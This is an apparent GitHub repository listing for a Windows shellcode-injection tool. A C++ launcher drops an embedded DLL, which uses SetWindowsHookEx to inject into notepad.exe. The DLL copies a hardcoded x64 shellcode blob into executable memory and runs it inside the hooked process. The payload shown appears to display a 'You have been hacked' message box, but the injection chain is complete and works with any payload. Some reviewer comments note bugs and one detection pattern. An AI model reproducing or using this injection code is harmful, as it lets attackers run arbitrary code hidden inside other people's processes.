├── Hooks.cpp ├── LICENSE ├── NotepadHook.cpp └── README.md /Hooks.cpp: -------------------------------------------------------------------------------- 1 | // Build as 64-bit. Hooks.cpp is the launcher: it carries NotepadHook.dll as an embedded resource, writes it to disk, then drives the DLL's exported hook functions. 2 | #include 3 | #include 4 | 5 | /* Function-pointer types matching the DLL's exported SetGlobalHook / UnsetGlobalHook (the include directives above lost their header names when this listing was rendered). */ typedef BOOL(*SetHook)(); 6 | typedef BOOL(*UnHook)(); 7 | 8 | /* GlobalHook: loads NotepadHook.dll by bare file name (main() writes it to the current directory first, so it is found via the normal DLL search order) and calls SetGlobalHook when isSet is TRUE, UnsetGlobalHook otherwise. Returns TRUE on success, FALSE if the DLL or the export cannot be resolved; the error code is printed before returning. NOTE(review): the module handle is never released with FreeLibrary, so each call leaves an extra reference on the DLL. GetLastError() returns a DWORD, so "%d" is a mismatched format specifier; "%lu" would match. */ 9 | BOOL GlobalHook(BOOL isSet) { 10 | HMODULE hModule = LoadLibrary(L"NotepadHook.dll"); 11 | if (!hModule) 12 | { 13 | printf("LoadLibrary Error:%d", GetLastError()); 14 | return FALSE; 15 | } 16 | 17 | if (isSet == TRUE) 18 | { 19 | SetHook sethook = (SetHook)GetProcAddress(hModule, "SetGlobalHook"); 20 | if (!sethook) 21 | { 22 | printf("GetProcAddress SetGlobalHook Error:%d", GetLastError()); 23 | return FALSE; 24 | } 25 | /* Return value of the export is ignored; TRUE is reported as long as the call was made. */ sethook(); 26 | return TRUE; 27 | } 28 | else 29 | { 30 | UnHook unhook = (UnHook)GetProcAddress(hModule, "UnsetGlobalHook"); 31 | if (!unhook) 32 | { 33 | printf("GetProcAddress UnsetGlobalHook Error:%d", GetLastError()); 34 | return FALSE; 35 | } 36 | unhook(); 37 | return TRUE; 38 | } 39 | 40 | } 41 | 42 | /* main: entry point. (1) Locate resource id 101 of the custom type "MYDLL" in this executable (module handle 0 = the calling process image), (2) write its bytes to NotepadHook.dll in the current working directory, (3) install the hook, wait for a key press, remove the hook, wait again. NOTE(review): every error path returns FALSE (0), which is indistinguishable from a successful exit status; the fopen_s result is never checked, so if the file cannot be created fp stays NULL and fwrite dereferences it; fwrite and fclose results are ignored. The DLL dropped next to the launcher is the durable on-disk artifact of a run. */ int main(int argc, char* argv[]) { 43 | // Deferred drop: the DLL is compiled into the executable's resources and written out only at run time. 44 | HRSRC hRsrc = FindResource(0, (LPCWSTR)101, L"MYDLL"); 45 | if (!hRsrc) 46 | { 47 | printf("FindResource Error:%d", GetLastError()); 48 | return FALSE; 49 | } 50 | 51 | DWORD dwSize = SizeofResource(NULL, hRsrc); 52 | if (!dwSize) 53 | { 54 | printf("SizeofResource Error:%d", GetLastError()); 55 | return FALSE; 56 | } 57 | 58 | HGLOBAL hGlobal = LoadResource(NULL, hRsrc); 59 | if (!hGlobal) 60 | { 61 | printf("LoadResource Error:%d", GetLastError()); 62 | return FALSE; 63 | } 64 | 65 | LPVOID lpVoid = LockResource(hGlobal); 66 | if (!lpVoid) 67 | { 68 | printf("LockResource Error:%d", GetLastError()); 69 | return FALSE; 70 | } 71 | 72 | FILE* fp = NULL; 73 | /* fopen_s returns an errno_t that is discarded here; fp is used unconditionally below. */ fopen_s(&fp, "NotepadHook.dll", "wb+"); 74 | fwrite(lpVoid, sizeof(char), dwSize, fp); 75 | fclose(fp); 76 | 77 | /* NULL is used where FALSE is meant; bRet is overwritten on the next line anyway. */ BOOL bRet = NULL; 78 | bRet = GlobalHook(TRUE); 79 | if (!bRet) 80 | { 81 | printf("SetGlobalHook Error:%d", GetLastError()); 82 | 
return FALSE; 83 | } 84 | /* The hook stays installed until a key is pressed; system("pause") spawns a command shell just to wait. */ system("pause"); 85 | bRet = GlobalHook(FALSE); 86 | if (!bRet) 87 | { 88 | printf("UnSetGlobalHook Error:%d", GetLastError()); 89 | return FALSE; 90 | } 91 | system("pause"); 92 | return 0; 93 | 94 | } 95 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Snowming 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /NotepadHook.cpp: -------------------------------------------------------------------------------- 1 | // NotepadHook.cpp : defines the entry point for the DLL. This is the module that SetWindowsHookEx loads into the hooked process. 2 | // Must be built as x64 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | /* g_hHook lives in a named data section that the linker directive below marks read/write/shared, so every process that maps this DLL sees the same hook handle: SetGlobalHook writes it, UnsetGlobalHook and MyFunction read it. (The include directives above lost their header names when this listing was rendered.) */ #pragma data_seg("myhookhandle") 9 | HHOOK g_hHook = NULL; 10 | #pragma data_seg() 11 | #pragma comment(linker,"/SECTION:myhookhandle,RWS") 12 | 13 | 14 | /* Module handle of this DLL, recorded in DllMain and passed to SetWindowsHookEx as the hook module. */ HMODULE g_hModule = NULL; 15 | 16 | DWORD GetMainThreadIdFromName(LPCSTR szName); 17 | 18 | 19 | // Look up the "main" thread ID of the first process whose image name matches szName, case-insensitively (needs tlhelp32.h). 20 | // Returns 0 if no matching process or no thread for it is found. NOTE(review): the two snapshot handles are used without checking for INVALID_HANDLE_VALUE; "main thread" simply means the first thread the snapshot lists for that process. 21 | DWORD GetMainThreadIdFromName(LPCSTR szName) 22 | { 23 | DWORD idThread = 0; // main-thread ID (the result) 24 | DWORD idProcess = 0; // process ID of the matching process 25 | 26 | // Step 1: find the process ID 27 | PROCESSENTRY32 pe; // process entry 28 | pe.dwSize = sizeof(PROCESSENTRY32); 29 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // snapshot of all processes 30 | if (Process32First(hSnapshot, &pe)) // first process in the snapshot 31 | { 32 | do 33 | { 34 | if (0 == _stricmp(pe.szExeFile, szName)) // case-insensitive compare 35 | { 36 | idProcess = pe.th32ProcessID; 37 | break; 38 | } 39 | } while (Process32Next(hSnapshot, &pe)); // next process 40 | } 41 | CloseHandle(hSnapshot); // release the snapshot 42 | if (idProcess == 0) 43 | { 44 | return 0; 45 | } 46 | 47 | // Step 2: find a thread owned by that process 48 | THREADENTRY32 te; // thread entry 49 | te.dwSize = sizeof(THREADENTRY32); 50 | hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); // snapshot of all threads in the system 51 | if (Thread32First(hSnapshot, &te)) // first thread 52 | { 53 | do 54 | { 55 | if (idProcess == te.th32OwnerProcessID) // the first thread found for this process is taken to be the main thread 56 | { 57 | idThread = te.th32ThreadID; 58 | break; 59 | } 60 | } while (Thread32Next(hSnapshot, &te)); // next thread 61 | } 62 | CloseHandle(hSnapshot); // release the snapshot 63 | return idThread; 64 | } 65 | 66 | 67 | 68 | /* DllMain: records the module handle on process attach; nothing else is done for any reason code. */ 69 | BOOL APIENTRY DllMain(HMODULE hModule, 70 | DWORD ul_reason_for_call, 71 | LPVOID lpReserved 72 | ) 73 | { 74 | switch (ul_reason_for_call) 75 | { 76 | case DLL_PROCESS_ATTACH: 77 | g_hModule = hModule; /* fallthrough */ 78 | case 
DLL_THREAD_ATTACH: 79 | case DLL_THREAD_DETACH: 80 | case DLL_PROCESS_DETACH: 81 | break; 82 | } 83 | return TRUE; 84 | } 85 | 86 | /* MyFunction: the WH_GETMESSAGE hook procedure installed by SetGlobalHook, so it executes inside the hooked process's message loop rather than in the launcher. On every invocation it allocates a fresh PAGE_EXECUTE_READWRITE region, copies the embedded byte string into it, calls it, and then forwards the message with CallNextHookEx. The byte string ends with the ASCII text "You have been hacked ^_^" and "Important Warning!", presumably displayed by the payload. NOTE(review): the VirtualAlloc result is not checked (memcpy would write through NULL on failure) and the region is never released. For defenders: a hook DLL that allocates RWX memory and calls into it from a hook callback, following a SetWindowsHookEx from an unfamiliar module, is a well-known detection pattern. */ LRESULT MyFunction(int code, WPARAM wParam, LPARAM lParam) { 87 | unsigned char shellcode[] = 88 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" 89 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" 90 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" 91 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" 92 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" 93 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" 94 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" 95 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" 96 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" 97 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" 98 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" 99 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" 100 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" 101 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 102 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" 103 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d" 104 | "\x85\x33\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" 105 | "\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48" 106 | "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13" 107 | "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x59\x6f\x75\x20\x68" 108 | "\x61\x76\x65\x20\x62\x65\x65\x6e\x20\x68\x61\x63\x6b\x65\x64" 109 | "\x20\x5e\x5f\x5e\x00\x49\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20" 110 | "\x57\x61\x72\x6e\x69\x6e\x67\x21\x00"; 111 | /* RWX allocation, unchecked. */ void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 112 | memcpy(exec, shellcode, sizeof shellcode); 113 | ((void(*)())exec)(); 114 | return CallNextHookEx(g_hHook, code, wParam, 
lParam); 115 | } 116 | 117 | /* SetGlobalHook (exported): installs a WH_GETMESSAGE hook on the thread that GetMainThreadIdFromName reports for "notepad.exe", with this DLL as the hook module, and stores the handle in the shared g_hHook. Returns FALSE if SetWindowsHookEx fails. NOTE(review): a 0 result from GetMainThreadIdFromName is passed through unchecked; SetWindowsHookEx documents a thread id of 0 as "all existing threads on the calling thread's desktop", so a missing notepad.exe widens the hook's scope instead of failing. */ EXTERN_C __declspec(dllexport) BOOL SetGlobalHook() { 118 | g_hHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)MyFunction, g_hModule, GetMainThreadIdFromName("notepad.exe")); 119 | if (!g_hHook) 120 | { 121 | return FALSE; 122 | } 123 | return TRUE; 124 | } 125 | 126 | /* UnsetGlobalHook (exported): removes the hook if one is recorded in the shared g_hHook. The result of UnhookWindowsHookEx is ignored, g_hHook is not cleared afterwards, and the function always returns TRUE. */ EXTERN_C __declspec(dllexport) BOOL UnsetGlobalHook() { 127 | if (g_hHook) 128 | { 129 | UnhookWindowsHookEx(g_hHook); 130 | } 131 | return TRUE; 132 | } 133 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # inject_shellcode_message_hook 2 | inject shellcode into remote process via message hook 3 | --------------------------------------------------------------------------------